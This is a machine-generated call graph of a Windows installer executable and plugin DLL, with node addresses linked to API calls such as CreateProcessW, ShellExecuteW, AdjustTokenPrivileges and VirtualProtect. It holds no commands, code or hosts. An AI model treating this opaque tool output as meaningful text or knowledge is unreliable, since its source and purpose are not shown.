4452->4451 4454 405774 4453->4454 4455 4057c0 4454->4455 4456 405788 MessageBoxIndirectW 4454->4456 4455->4418 4456->4455 4458 405c72 ReadFile 4457->4458 4459 403076 4458->4459 4459->4427 4459->4428 4459->4430 4461 406558 4460->4461 4462 406560 4460->4462 4461->4438 4462->4461 4463 4065f0 GlobalAlloc 4462->4463 4464 4065e7 GlobalFree 4462->4464 4465 406667 GlobalAlloc 4462->4465 4466 40665e GlobalFree 4462->4466 4463->4461 4463->4462 4464->4463 4465->4461 4465->4462 4466->4465 4467->4422 5252 100018a9 5253 100018cc 5252->5253 5254 100018ff GlobalFree 5253->5254 5255 10001911 5253->5255 5254->5255 5256 10001272 2 API calls 5255->5256 5257 10001a87 GlobalFree GlobalFree 5256->5257 5258 401ee9 5259 402bbf 18 API calls 5258->5259 5260 401ef0 5259->5260 5261 40635d 2 API calls 5260->5261 5262 401ef6 5261->5262 5263 401f07 5262->5263 5265 405f61 wsprintfW 5262->5265 5265->5263 4471 40326a SetErrorMode GetVersion 4472 4032a5 4471->4472 4473 40329f 4471->4473 4559 406384 GetSystemDirectoryW 4472->4559 4474 4063f4 5 API calls 4473->4474 4474->4472 4476 4032bb lstrlenA 4476->4472 4477 4032cb 4476->4477 4562 4063f4 GetModuleHandleA 4477->4562 4480 4063f4 5 API calls 4481 4032da #17 OleInitialize SHGetFileInfoW 4480->4481 4568 40601a lstrcpynW 4481->4568 4483 403317 GetCommandLineW 4569 40601a lstrcpynW 4483->4569 4485 403329 GetModuleHandleW 4486 403341 4485->4486 4487 4059fb CharNextW 4486->4487 4488 403350 CharNextW 4487->4488 4489 40347a GetTempPathW 4488->4489 4497 403369 4488->4497 4570 403239 4489->4570 4491 403492 4492 403496 GetWindowsDirectoryW lstrcatW 4491->4492 4493 4034ec DeleteFileW 4491->4493 4494 403239 12 API calls 4492->4494 4580 402dee GetTickCount GetModuleFileNameW 4493->4580 4498 4034b2 4494->4498 4495 4059fb CharNextW 4495->4497 4497->4495 4503 403465 4497->4503 4505 403463 4497->4505 4498->4493 4500 4034b6 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4498->4500 4499 403500 4501 4035b3 4499->4501 4506 4035a3 4499->4506 4511 4059fb CharNextW 4499->4511 4504 403239 12 API calls 4500->4504 4681 403789 4501->4681 4664 40601a lstrcpynW 4503->4664 4509 4034e4 4504->4509 4505->4489 4608 403863 4506->4608 4509->4493 4509->4501 4523 40351f 4511->4523 4512 4036ed 4515 403771 ExitProcess 4512->4515 4516 4036f5 GetCurrentProcess OpenProcessToken 4512->4516 4513 4035cd 4514 40575f MessageBoxIndirectW 4513->4514 4520 4035db ExitProcess 4514->4520 4521 403741 4516->4521 4522 40370d LookupPrivilegeValueW AdjustTokenPrivileges 4516->4522 4518 4035e3 4688 4056e2 4518->4688 4519 40357d 4665 405ad6 4519->4665 4526 4063f4 5 API calls 4521->4526 4522->4521 4523->4518 4523->4519 4529 403748 4526->4529 4532 40375d ExitWindowsEx 4529->4532 4533 40376a 4529->4533 4530 403604 lstrcatW lstrcmpiW 4530->4501 4535 403620 4530->4535 4531 4035f9 lstrcatW 4531->4530 4532->4515 4532->4533 4536 40140b MulDiv 4533->4536 4538 403625 4535->4538 4539 40362c 4535->4539 4536->4515 4537 403598 4680 40601a lstrcpynW 4537->4680 4691 405648 CreateDirectoryW 4538->4691 4696 4056c5 CreateDirectoryW 4539->4696 4544 403631 SetCurrentDirectoryW 4545 403641 4544->4545 4546 40364c 4544->4546 4699 40601a lstrcpynW 4545->4699 4700 40601a lstrcpynW 4546->4700 4549 40603c 18 API calls 4550 40368b DeleteFileW 4549->4550 4551 403698 CopyFileW 4550->4551 4556 40365a 4550->4556 4551->4556 4552 4036e1 4553 405ebb 38 API calls 4552->4553 4553->4501 4555 40603c 18 API calls 4555->4556 4556->4549 4556->4552 4556->4555 4558 4036cc CloseHandle 4556->4558 4701 405ebb MoveFileExW 4556->4701 4705 4056fa CreateProcessW 4556->4705 4558->4556 4560 4063a6 wsprintfW LoadLibraryExW 4559->4560 4560->4476 4563 406410 4562->4563 4564 40641a GetProcAddress 4562->4564 4565 406384 3 API calls 4563->4565 4566 4032d3 4564->4566 4567 406416 4565->4567 4566->4480 4567->4564 4567->4566 4568->4483 4569->4485 4571 4062ae 5 API calls 4570->4571 4572 403245 4571->4572 4573 40324f 4572->4573 4574 4059ce 3 API calls 4572->4574 4573->4491 4575 403257 4574->4575 4576 4056c5 2 API calls 4575->4576 4577 40325d 4576->4577 4708 405c1e 4577->4708 4712 405bef GetFileAttributesW CreateFileW 4580->4712 4582 402e2e 4599 402e3e 4582->4599 4713 40601a lstrcpynW 4582->4713 4584 402e54 4714 405a1a lstrlenW 4584->4714 4588 402e65 GetFileSize 4604 402f61 4588->4604 4607 402e7c 4588->4607 4590 402f6a 4592 402f9a GlobalAlloc 4590->4592 4590->4599 4731 403222 SetFilePointer 4590->4731 4591 40320c ReadFile 4591->4607 4730 403222 SetFilePointer 4592->4730 4594 402fcd 4598 402d8a 6 API calls 4594->4598 4596 402f83 4600 40320c ReadFile 4596->4600 4597 402fb5 4601 403027 36 API calls 4597->4601 4598->4599 4599->4499 4602 402f8e 4600->4602 4605 402fc1 4601->4605 4602->4592 4602->4599 4603 402d8a 6 API calls 4603->4607 4719 402d8a 4604->4719 4605->4599 4605->4605 4606 402ffe SetFilePointer 4605->4606 4606->4599 4607->4591 4607->4594 4607->4599 4607->4603 4607->4604 4609 4063f4 5 API calls 4608->4609 4610 403877 4609->4610 4611 40388f 4610->4611 4613 40387d 4610->4613 4612 405ee7 3 API calls 4611->4612 4614 4038bf 4612->4614 4750 405f61 wsprintfW 4613->4750 4616 4038de lstrcatW 4614->4616 4618 405ee7 3 API calls 4614->4618 4617 40388d 4616->4617 4736 403b39 4617->4736 4618->4616 4621 405ad6 18 API calls 4622 403910 4621->4622 4623 4039a4 4622->4623 4625 405ee7 3 API calls 4622->4625 4624 405ad6 18 API calls 4623->4624 4626 4039aa 4624->4626 4627 403942 4625->4627 4628 4039ba LoadImageW 4626->4628 4629 40603c 18 API calls 4626->4629 4627->4623 4632 403963 lstrlenW 4627->4632 4636 4059fb CharNextW 4627->4636 4630 403a60 4628->4630 4631 4039e1 RegisterClassW 4628->4631 4629->4628 4635 40140b MulDiv 4630->4635 4633 403a17 SystemParametersInfoW CreateWindowExW 4631->4633 4634 403a6a 4631->4634 4637 403971 lstrcmpiW 4632->4637 4638 403997 4632->4638 4633->4630 4634->4501 4639 403a66 4635->4639 4640 403960 4636->4640 4637->4638 4641 403981 GetFileAttributesW 4637->4641 4642 4059ce 3 API calls 4638->4642 4639->4634 4644 403b39 19 API calls 4639->4644 4640->4632 4643 40398d 4641->4643 4645 40399d 4642->4645 4643->4638 4646 405a1a 2 API calls 4643->4646 4647 403a77 4644->4647 4751 40601a lstrcpynW 4645->4751 4646->4638 4649 403a83 ShowWindow 4647->4649 4650 403b06 4647->4650 4651 406384 3 API calls 4649->4651 4745 40524c OleInitialize 4650->4745 4653 403a9b 4651->4653 4655 403aa9 GetClassInfoW 4653->4655 4658 406384 3 API calls 4653->4658 4654 403b0c 4656 403b10 4654->4656 4657 403b28 4654->4657 4660 403ad3 DialogBoxParamW 4655->4660 4661 403abd GetClassInfoW RegisterClassW 4655->4661 4656->4634 4662 40140b MulDiv 4656->4662 4659 40140b MulDiv 4657->4659 4658->4655 4659->4634 4663 40140b MulDiv 4660->4663 4661->4660 4662->4634 4663->4634 4664->4505 4753 40601a lstrcpynW 4665->4753 4667 405ae7 4754 405a79 CharNextW CharNextW 4667->4754 4670 403589 4670->4501 4679 40601a lstrcpynW 4670->4679 4671 4062ae 5 API calls 4677 405afd 4671->4677 4672 405b2e lstrlenW 4673 405b39 4672->4673 4672->4677 4674 4059ce 3 API calls 4673->4674 4676 405b3e GetFileAttributesW 4674->4676 4675 40635d 2 API calls 4675->4677 4676->4670 4677->4670 4677->4672 4677->4675 4678 405a1a 2 API calls 4677->4678 4678->4672 4679->4537 4680->4506 4682 4037a1 4681->4682 4683 403793 CloseHandle 4681->4683 4760 4037ce 4682->4760 4683->4682 4689 4063f4 5 API calls 4688->4689 4690 4035e8 lstrcatW 4689->4690 4690->4530 4690->4531 4692 40362a 4691->4692 4693 405699 GetLastError 4691->4693 4692->4544 4693->4692 4694 4056a8 SetFileSecurityW 4693->4694 4694->4692 4695 4056be GetLastError 4694->4695 4695->4692 4697 4056d5 4696->4697 4698 4056d9 GetLastError 4696->4698 4697->4544 4698->4697 4699->4546 4700->4556 4702 405edc 4701->4702 4703 405ecf 4701->4703 4702->4556 4814 405d49 lstrcpyW 4703->4814 4706 405739 4705->4706 4707 40572d CloseHandle 4705->4707 4706->4556 4707->4706 4709 405c2b GetTickCount GetTempFileNameW 4708->4709 4710 405c61 4709->4710 4711 403268 4709->4711 4710->4709 4710->4711 4711->4491 4712->4582 4713->4584 4715 405a28 4714->4715 4716 402e5a 4715->4716 4717 405a2e CharPrevW 4715->4717 4718 40601a lstrcpynW 4716->4718 4717->4715 4717->4716 4718->4588 4720 402d93 4719->4720 4721 402dab 4719->4721 4722 402da3 4720->4722 4723 402d9c DestroyWindow 4720->4723 4724 402db3 4721->4724 4725 402dbb GetTickCount 4721->4725 4722->4590 4723->4722 4732 406430 4724->4732 4727 402dc9 CreateDialogParamW ShowWindow 4725->4727 4728 402dec 4725->4728 4727->4728 4728->4590 4730->4597 4731->4596 4733 40644d PeekMessageW 4732->4733 4734 406443 DispatchMessageW 4733->4734 4735 402db9 4733->4735 4734->4733 4735->4590 4737 403b4d 4736->4737 4752 405f61 wsprintfW 4737->4752 4739 403bbe 4740 40603c 18 API calls 4739->4740 4741 403bca SetWindowTextW 4740->4741 4742 4038ee 4741->4742 4743 403be6 4741->4743 4742->4621 4743->4742 4744 40603c 18 API calls 4743->4744 4744->4743 4746 40526f 4745->4746 4748 401389 MulDiv 4746->4748 4749 405296 4746->4749 4747 4052a8 OleUninitialize 4747->4654 4748->4746 4749->4747 4750->4617 4751->4623 4752->4739 4753->4667 4755 405a96 4754->4755 4758 405aa8 4754->4758 4756 405aa3 CharNextW 4755->4756 4755->4758 4759 405acc 4756->4759 4757 4059fb CharNextW 4757->4758 4758->4757 4758->4759 4759->4670 4759->4671 4761 4037dc 4760->4761 4762 4037e1 FreeLibrary GlobalFree 4761->4762 4763 4037a6 4761->4763 4762->4762 4762->4763 4764 40580b 4763->4764 4765 405ad6 18 API calls 4764->4765 4766 40582b 4765->4766 4767 405833 DeleteFileW 4766->4767 4768 40584a 4766->4768 4769 4035bc OleUninitialize 4767->4769 4770 405975 4768->4770 4804 40601a lstrcpynW 4768->4804 4769->4512 4769->4513 4770->4769 4777 40635d 2 API calls 4770->4777 4772 405870 4773 405883 4772->4773 4774 405876 lstrcatW 4772->4774 4776 405a1a 2 API calls 4773->4776 4775 405889 4774->4775 4778 405899 lstrcatW 4775->4778 4779 40588f 4775->4779 4776->4775 4780 40598f 4777->4780 4781 4058a4 lstrlenW FindFirstFileW 4778->4781 4779->4778 4779->4781 4780->4769 4782 405993 4780->4782 4783 40596a 4781->4783 4785 4058c6 4781->4785 4784 4059ce 3 API calls 4782->4784 4783->4770 4786 405999 4784->4786 4789 40594d FindNextFileW 4785->4789 4797 40580b 62 API calls 4785->4797 4799 405179 25 API calls 4785->4799 4802 405179 25 API calls 4785->4802 4803 405ebb 38 API calls 4785->4803 4805 40601a lstrcpynW 4785->4805 4806 4057c3 4785->4806 4787 4057c3 5 API calls 4786->4787 4790 4059a5 4787->4790 4789->4785 4791 405963 FindClose 4789->4791 4792 4059a9 4790->4792 4793 4059bf 4790->4793 4791->4783 4792->4769 4796 405179 25 API calls 4792->4796 4795 405179 25 API calls 4793->4795 4795->4769 4798 4059b6 4796->4798 4797->4785 4800 405ebb 38 API calls 4798->4800 4799->4789 4801 4059bd 4800->4801 4801->4769 4802->4785 4803->4785 4804->4772 4805->4785 4807 405bca 2 API calls 4806->4807 4808 4057cf 4807->4808 4809 4057e6 DeleteFileW 4808->4809 4810 4057de RemoveDirectoryW 4808->4810 4811 4057f0 4808->4811 4812 4057ec 4809->4812 4810->4812 4811->4785 4812->4811 4813 4057fc SetFileAttributesW 4812->4813 4813->4811 4815 405d71 4814->4815 4816 405d97 GetShortPathNameW 4814->4816 4841 405bef GetFileAttributesW CreateFileW 4815->4841 4817 405eb6 4816->4817 4818 405dac 4816->4818 4817->4702 4818->4817 4821 405db4 wsprintfA 4818->4821 4820 405d7b CloseHandle GetShortPathNameW 4820->4817 4822 405d8f 4820->4822 4823 40603c 18 API calls 4821->4823 4822->4816 4822->4817 4824 405ddc 4823->4824 4842 405bef GetFileAttributesW CreateFileW 4824->4842 4826 405de9 4826->4817 4827 405df8 GetFileSize GlobalAlloc 4826->4827 4828 405e1a 4827->4828 4829 405eaf CloseHandle 4827->4829 4830 405c72 ReadFile 4828->4830 4829->4817 4831 405e22 4830->4831 4831->4829 4843 405b54 lstrlenA 4831->4843 4834 405e39 lstrcpyA 4837 405e5b 4834->4837 4835 405e4d 4836 405b54 4 API calls 4835->4836 4836->4837 4838 405e92 SetFilePointer 4837->4838 4839 405ca1 WriteFile 4838->4839 4840 405ea8 GlobalFree 4839->4840 4840->4829 4841->4820 4842->4826 4844 405b95 lstrlenA 4843->4844 4845 405b9d 4844->4845 4846 405b6e lstrcmpiA 4844->4846 4845->4834 4845->4835 4846->4845 4847 405b8c CharNextA 4846->4847 4847->4844 4864 4021ea 4865 402bbf 18 API calls 4864->4865 4866 4021f0 4865->4866 4867 402bbf 18 API calls 4866->4867 4868 4021f9 4867->4868 4869 402bbf 18 API calls 4868->4869 4870 402202 4869->4870 4871 40635d 2 API calls 4870->4871 4872 40220b 4871->4872 4873 40221c lstrlenW lstrlenW 4872->4873 4877 40220f 4872->4877 4874 405179 25 API calls 4873->4874 4876 40225a SHFileOperationW 4874->4876 4875 405179 25 API calls 4878 402217 4875->4878 4876->4877 4876->4878 4877->4875 4877->4878 4879 40156b 4880 401584 4879->4880 4881 40157b ShowWindow 4879->4881 4882 401592 ShowWindow 4880->4882 4883 402a4c 4880->4883 4881->4880 4882->4883 5273 4050ed 5274 405111 5273->5274 5282 4050fd 5273->5282 5275 405119 IsWindowVisible 5274->5275 5280 405130 5274->5280 5276 405126 5275->5276 5275->5282 5283 404a43 SendMessageW 5276->5283 5277 40515f CallWindowProcW 5279 405103 5277->5279 5280->5277 5288 404ac3 5280->5288 5282->5277 5282->5279 5284 404aa2 SendMessageW 5283->5284 5285 404a66 GetMessagePos ScreenToClient SendMessageW 5283->5285 5286 404a9a 5284->5286 5285->5286 5287 404a9f 5285->5287 5286->5280 5287->5284 5297 40601a lstrcpynW 5288->5297 5290 404ad6 5298 405f61 wsprintfW 5290->5298 5292 404ae0 5293 40140b MulDiv 5292->5293 5294 404ae9 5293->5294 5299 40601a lstrcpynW 5294->5299 5296 404af0 5296->5282 5297->5290 5298->5292 5299->5296 5300 40226e 5301 402288 5300->5301 5302 402275 5300->5302 5303 40603c 18 API calls 5302->5303 5304 402282 5303->5304 5305 40575f MessageBoxIndirectW 5304->5305 5305->5301 5306 4014f1 SetForegroundWindow 5307 402a4c 5306->5307 5308 4041f2 lstrcpynW lstrlenW 5309 401673 5310 402bbf 18 API calls 5309->5310 5311 40167a 5310->5311 5312 402bbf 18 API calls 5311->5312 5313 401683 5312->5313 5314 402bbf 18 API calls 5313->5314 5315 40168c MoveFileW 5314->5315 5316 401698 5315->5316 5317 40169f 5315->5317 5319 401423 25 API calls 5316->5319 5318 40635d 2 API calls 5317->5318 5321 4021e1 5317->5321 5320 4016ae 5318->5320 5319->5321 5320->5321 5322 405ebb 38 API calls 5320->5322 5322->5316 5323 404af5 GetDlgItem GetDlgItem 5324 404b47 7 API calls 5323->5324 5336 404d58 5323->5336 5325 404bea DeleteObject 5324->5325 5326 404bdd SendMessageW 5324->5326 5327 404bf3 5325->5327 5326->5325 5328 404c2a 5327->5328 5329 40603c 18 API calls 5327->5329 5330 4040de 19 API calls 5328->5330 5333 404c0c SendMessageW SendMessageW 5329->5333 5337 404c3e 5330->5337 5331 404ef0 5334 404f02 5331->5334 5335 404efa SendMessageW 5331->5335 5332 404e44 5332->5331 5342 404e9d SendMessageW 5332->5342 5360 404d53 5332->5360 5333->5327 5344 404f14 ImageList_Destroy 5334->5344 5345 404f1b 5334->5345 5353 404f2b 5334->5353 5335->5334 5336->5332 5340 404a43 5 API calls 5336->5340 5355 404dd1 5336->5355 5341 4040de 19 API calls 5337->5341 5338 404145 8 API calls 5343 4050e6 5338->5343 5339 404e36 SendMessageW 5339->5332 5340->5355 5356 404c4c 5341->5356 5347 404eb2 SendMessageW 5342->5347 5342->5360 5344->5345 5349 404f24 GlobalFree 5345->5349 5345->5353 5346 40509a 5351 4050ac ShowWindow GetDlgItem ShowWindow 5346->5351 5346->5360 5348 404ec5 5347->5348 5358 404ed6 SendMessageW 5348->5358 5349->5353 5350 404d21 GetWindowLongW SetWindowLongW 5352 404d3a 5350->5352 5351->5360 5352->5336 5354 404d40 ShowWindow 5352->5354 5353->5346 5363 404ac3 3 API calls 5353->5363 5367 404f66 5353->5367 5354->5360 5355->5332 5355->5339 5356->5350 5357 404c9c SendMessageW 5356->5357 5359 404d1b 5356->5359 5361 404cd8 SendMessageW 5356->5361 5362 404ce9 SendMessageW 5356->5362 5357->5356 5358->5331 5359->5350 5359->5352 5360->5338 5361->5356 5362->5356 5363->5367 5364 405070 InvalidateRect 5364->5346 5365 405086 5364->5365 5371 4049fe 5365->5371 5366 404f94 SendMessageW 5370 404faa 5366->5370 5367->5366 5367->5370 5369 40501e SendMessageW SendMessageW 5369->5370 5370->5364 5370->5369 5374 404935 5371->5374 5373 404a13 5373->5346 5375 40494e 5374->5375 5376 40603c 18 API calls 5375->5376 5377 4049b2 5376->5377 5378 40603c 18 API calls 5377->5378 5379 4049bd 5378->5379 5380 40603c 18 API calls 5379->5380 5381 4049d3 lstrlenW wsprintfW SetDlgItemTextW 5380->5381 5381->5373 5382 100016b6 5383 100016e5 5382->5383 5384 10001b18 22 API calls 5383->5384 5385 100016ec 5384->5385 5386 100016f3 5385->5386 5387 100016ff 5385->5387 5390 10001272 2 API calls 5386->5390 5388 10001726 5387->5388 5389 10001709 5387->5389 5392 10001750 5388->5392 5393 1000172c 5388->5393 5391 1000153d 3 API calls 5389->5391 5397 100016fd 5390->5397 5394 1000170e 5391->5394 5396 1000153d 3 API calls 5392->5396 5395 100015b4 3 API calls 5393->5395 5398 100015b4 3 API calls 5394->5398 5399 10001731 5395->5399 5396->5397 5400 10001714 5398->5400 5401 10001272 2 API calls 5399->5401 5402 10001272 2 API calls 5400->5402 5403 10001737 GlobalFree 5401->5403 5404 1000171a GlobalFree 5402->5404 5403->5397 5405 1000174b GlobalFree 5403->5405 5404->5397 5405->5397 5406 10002238 5407 10002296 5406->5407 5408 100022cc 5406->5408 5407->5408 5409 100022a8 GlobalAlloc 5407->5409 5409->5407 5410 404579 5411 4045a5 5410->5411 5412 4045b6 5410->5412 5467 405743 GetDlgItemTextW 5411->5467 5414 4045c2 GetDlgItem 5412->5414 5420 404621 5412->5420 5416 4045d6 5414->5416 5415 4045b0 5418 4062ae 5 API calls 5415->5418 5419 4045ea SetWindowTextW 5416->5419 5423 405a79 4 API calls 5416->5423 5417 404705 5466 4048a2 5417->5466 5468 405743 GetDlgItemTextW 5417->5468 5418->5412 5424 4040de 19 API calls 5419->5424 5420->5417 5425 40603c 18 API calls 5420->5425 5420->5466 5422 404145 8 API calls 5430 4048c8 5422->5430 5431 4045e0 5423->5431 5427 404606 5424->5427 5428 404695 SHBrowseForFolderW 5425->5428 5426 404735 5429 405ad6 18 API calls 5426->5429 5432 4040de 19 API calls 5427->5432 5428->5417 5433 4046ad CoTaskMemFree 5428->5433 5434 40473b 5429->5434 5431->5419 5437 4059ce 3 API calls 5431->5437 5435 404614 5432->5435 5436 4059ce 3 API calls 5433->5436 5469 40601a lstrcpynW 5434->5469 5442 4063f4 5 API calls 5435->5442 5438 4046ba 5436->5438 5437->5419 5440 4046f1 SetDlgItemTextW 5438->5440 5444 40603c 18 API calls 5438->5444 5440->5417 5441 404752 5443 4063f4 5 API calls 5441->5443 5442->5420 5451 404759 5443->5451 5445 4046d9 lstrcmpiW 5444->5445 5445->5440 5448 4046ea lstrcatW 5445->5448 5446 40479a 5470 40601a lstrcpynW 5446->5470 5448->5440 5449 4047a1 5450 405a79 4 API calls 5449->5450 5452 4047a7 GetDiskFreeSpaceW 5450->5452 5451->5446 5455 405a1a 2 API calls 5451->5455 5457 4047f2 5451->5457 5454 4047cb MulDiv 5452->5454 5452->5457 5454->5457 5455->5451 5456 404863 5459 404886 5456->5459 5461 40140b MulDiv 5456->5461 5457->5456 5458 4049fe 21 API calls 5457->5458 5460 404850 5458->5460 5471 404100 KiUserCallbackDispatcher 5459->5471 5463 404865 SetDlgItemTextW 5460->5463 5464 404855 5460->5464 5461->5459 5463->5456 5465 404935 21 API calls 5464->5465 5465->5456 5466->5422 5467->5415 5468->5426 5469->5441 5470->5449 5471->5466 5472 401cfa GetDlgItem GetClientRect 5473 402bbf 18 API calls 5472->5473 5474 401d2c LoadImageW 5473->5474 5475 401d42 5474->5475 5476 401d4a DeleteObject 5475->5476 5477 402a4c 5475->5477 5476->5477 4989 40237b 4990 402381 4989->4990 4991 402bbf 18 API calls 4990->4991 4992 402393 4991->4992 4993 402bbf 18 API calls 4992->4993 4994 40239d RegCreateKeyExW 4993->4994 4995 4023c7 4994->4995 4996 40281e 4994->4996 4997 4023e2 4995->4997 4998 402bbf 18 API calls 4995->4998 4999 4023ee 4997->4999 5001 402ba2 18 API calls 4997->5001 5000 4023d8 lstrlenW 4998->5000 5002 402409 RegSetValueExW 4999->5002 5003 403027 36 API calls 4999->5003 5000->4997 5001->4999 5004 40241f RegCloseKey 5002->5004 5003->5002 5004->4996 5478 40427b 5479 404293 5478->5479 5482 4043ad 5478->5482 5483 4040de 19 API calls 5479->5483 5480 4044e9 5488 404145 8 API calls 5480->5488 5481 404421 GetDlgItem 5484 4044aa 5481->5484 5485 40443b 5481->5485 5482->5480 5486 4043e8 GetDlgItem SendMessageW 5482->5486 5496 404412 5482->5496 5487 4042fa 5483->5487 5484->5480 5489 4044bc 5484->5489 5485->5484 5493 404461 6 API calls 5485->5493 5506 404100 KiUserCallbackDispatcher 5486->5506 5491 4040de 19 API calls 5487->5491 5492 4044e4 5488->5492 5494 4044d2 5489->5494 5495 4044c2 SendMessageW 5489->5495 5497 404307 CheckDlgButton 5491->5497 5493->5484 5494->5492 5498 4044d8 SendMessageW 5494->5498 5495->5494 5496->5480 5496->5481 5505 404100 KiUserCallbackDispatcher 5497->5505 5498->5492 5500 404325 GetDlgItem 5501 404113 5500->5501 5502 40433b SendMessageW 5501->5502 5503 404361 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5502->5503 5504 404358 GetSysColor 5502->5504 5503->5492 5504->5503 5505->5500 5506->5496 5507 4027fb 5508 402bbf 18 API calls 5507->5508 5509 402802 FindFirstFileW 5508->5509 5510 402815 5509->5510 5511 40282a 5509->5511 5512 402833 5511->5512 5515 405f61 wsprintfW 5511->5515 5516 40601a lstrcpynW 5512->5516 5515->5512 5516->5510 5517 1000103d 5518 1000101b 5 API calls 5517->5518 5519 10001056 5518->5519 5520 4014ff 5521 401507 5520->5521 5523 40151a 5520->5523 5522 402ba2 18 API calls 5521->5522 5522->5523 5524 401000 5525 401037 BeginPaint GetClientRect 5524->5525 5526 40100c DefWindowProcW 5524->5526 5528 4010f3 5525->5528 5529 401179 5526->5529 5530 401073 CreateBrushIndirect FillRect DeleteObject 5528->5530 5531 4010fc 5528->5531 5530->5528 5532 401102 CreateFontIndirectW 5531->5532 5533 401167 EndPaint 5531->5533 5532->5533 5534 401112 6 API calls 5532->5534 5533->5529 5534->5533 5535 406981 5539 406566 5535->5539 5536 406ed1 5537 4065f0 GlobalAlloc 5537->5536 5537->5539 5538 4065e7 GlobalFree 5538->5537 5539->5536 5539->5537 5539->5538 5539->5539 5540 406667 GlobalAlloc 5539->5540 5541 40665e GlobalFree 5539->5541 5540->5536 5540->5539 5541->5540 5542 401904 5543 40193b 5542->5543 5544 402bbf 18 API calls 5543->5544 5545 401940 5544->5545 5546 40580b 69 API calls 5545->5546 5547 401949 5546->5547 5548 402d04 5549 402d16 SetTimer 5548->5549 5550 402d2f 5548->5550 5549->5550 5551 402d84 5550->5551 5552 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5550->5552 5552->5551 4288 403c06 4289 403d59 4288->4289 4290 403c1e 4288->4290 4292 403daa 4289->4292 4293 403d6a GetDlgItem GetDlgItem 4289->4293 4290->4289 4291 403c2a 4290->4291 4294 403c35 SetWindowPos 4291->4294 4295 403c48 4291->4295 4300 401389 MulDiv 4292->4300 4322 403ddc 4292->4322 4296 4040de 19 API calls 4293->4296 4294->4295 4297 403c65 4295->4297 4298 403c4d ShowWindow 4295->4298 4299 403d94 SetClassLongW 4296->4299 4302 403c87 4297->4302 4303 403c6d DestroyWindow 4297->4303 4298->4297 4304 40140b MulDiv 4299->4304 4300->4322 4301 403d54 4306 403c8c SetWindowLongW 4302->4306 4307 403c9d 4302->4307 4305 404067 4303->4305 4304->4292 4305->4301 4312 404098 ShowWindow 4305->4312 4306->4301 4310 403ca9 GetDlgItem 4307->4310 4323 403cde 4307->4323 4308 40140b MulDiv 4308->4322 4309 404069 DestroyWindow EndDialog 4309->4305 4313 403cbc IsWindowEnabled 4310->4313 4316 403cd9 4310->4316 4312->4301 4313->4301 4313->4316 4314 40603c 18 API calls 4314->4322 4317 403d01 4316->4317 4318 403d16 4316->4318 4316->4323 4355 40140b 4317->4355 4319 40140b MulDiv 4318->4319 4319->4323 4320 4040de 19 API calls 4320->4322 4322->4301 4322->4308 4322->4309 4322->4314 4322->4320 4338 403fa9 DestroyWindow 4322->4338 4346 4040de 4322->4346 4358 404145 4323->4358 4325 403e91 GetDlgItem 4326 403ea6 4325->4326 4327 403eae ShowWindow KiUserCallbackDispatcher 4325->4327 4326->4327 4349 404100 KiUserCallbackDispatcher 4327->4349 4329 403ed8 EnableWindow 4332 403eec 4329->4332 4330 403ef1 GetSystemMenu EnableMenuItem SendMessageW 4331 403f21 SendMessageW 4330->4331 4330->4332 4331->4332 4332->4330 4350 40601a lstrcpynW 4332->4350 4334 403f4f lstrlenW 4335 40603c 18 API calls 4334->4335 4336 403f65 SetWindowTextW 4335->4336 4351 401389 4336->4351 4338->4305 4339 403fc3 CreateDialogParamW 4338->4339 4339->4305 4340 403ff6 4339->4340 4341 4040de 19 API calls 4340->4341 4342 404001 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4341->4342 4343 401389 MulDiv 4342->4343 4344 404047 4343->4344 4344->4301 4345 40404f ShowWindow 4344->4345 4345->4305 4347 40603c 18 API calls 4346->4347 4348 4040e9 SetDlgItemTextW 4347->4348 4348->4325 4349->4329 4350->4334 4352 401390 4351->4352 4353 4013fe 4352->4353 4354 4013cb MulDiv 4352->4354 4353->4322 4354->4352 4356 401389 MulDiv 4355->4356 4357 401420 4356->4357 4357->4323 4359 40415d GetWindowLongW 4358->4359 4369 4041e6 4358->4369 4360 40416e 4359->4360 4359->4369 4361 404180 4360->4361 4362 40417d GetSysColor 4360->4362 4363 404190 SetBkMode 4361->4363 4364 404186 SetTextColor 4361->4364 4362->4361 4365 4041a8 GetSysColor 4363->4365 4366 4041ae 4363->4366 4364->4363 4365->4366 4367 4041b5 SetBkColor 4366->4367 4368 4041bf 4366->4368 4367->4368 4368->4369 4370 4041d2 DeleteObject 4368->4370 4371 4041d9 CreateBrushIndirect 4368->4371 4369->4301 4370->4371 4371->4369 4372 402786 4373 40278d 4372->4373 4375 4029f7 4372->4375 4374 402ba2 18 API calls 4373->4374 4376 402798 4374->4376 4377 40279f SetFilePointer 4376->4377 4377->4375 4378 4027af 4377->4378 4380 405f61 wsprintfW 4378->4380 4380->4375 4468 100027c7 4469 10002817 4468->4469 4470 100027d7 VirtualProtect 4468->4470 4470->4469 5553 401907 5554 402bbf 18 API calls 5553->5554 5555 40190e 5554->5555 5556 40575f MessageBoxIndirectW 5555->5556 5557 401917 5556->5557 5558 401e08 5559 402bbf 18 API calls 5558->5559 5560 401e0e 5559->5560 5561 402bbf 18 API calls 5560->5561 5562 401e17 5561->5562 5563 402bbf 18 API calls 5562->5563 5564 401e20 5563->5564 5565 402bbf 18 API calls 5564->5565 5566 401e29 5565->5566 5567 401423 25 API calls 5566->5567 5568 401e30 ShellExecuteW 5567->5568 5569 401e61 5568->5569 5575 1000164f 5576 10001516 GlobalFree 5575->5576 5578 10001667 5576->5578 5577 100016ad GlobalFree 5578->5577 5579 10001682 5578->5579 5580 10001699 VirtualFree 5578->5580 5579->5577 5580->5577 5581 401491 5582 405179 25 API calls 5581->5582 5583 401498 5582->5583 5584 401a15 5585 402bbf 18 API calls 5584->5585 5586 401a1e ExpandEnvironmentStringsW 5585->5586 5587 401a32 5586->5587 5589 401a45 5586->5589 5588 401a37 lstrcmpW 5587->5588 5587->5589 5588->5589 5590 402515 5591 402bbf 18 API calls 5590->5591 5592 40251c 5591->5592 5595 405bef GetFileAttributesW CreateFileW 5592->5595 5594 402528 5595->5594 5596 402095 5597 402bbf 18 API calls 5596->5597 5598 40209c 5597->5598 5599 402bbf 18 API calls 5598->5599 5600 4020a6 5599->5600 5601 402bbf 18 API calls 5600->5601 5602 4020b0 5601->5602 5603 402bbf 18 API calls 5602->5603 5604 4020ba 5603->5604 5605 402bbf 18 API calls 5604->5605 5607 4020c4 5605->5607 5606 402103 CoCreateInstance 5611 402122 5606->5611 5607->5606 